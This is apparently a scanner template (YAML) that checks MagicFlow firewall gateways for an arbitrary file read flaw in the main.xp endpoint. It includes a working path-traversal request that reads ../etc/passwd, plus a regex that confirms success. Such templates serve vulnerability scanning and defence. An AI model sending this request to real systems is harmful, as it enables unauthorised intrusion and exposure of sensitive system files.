id: magicflow-main-xp-file-read

info:
  name: MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞，攻击者通过构造特定的Url获取敏感文件
    app="MSA/1.0"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/MagicFlow/MagicFlow%20%E9%98%B2%E7%81%AB%E5%A2%99%E7%BD%91%E5%85%B3%20main.xp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
    expression: response.status == 200 &&  "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
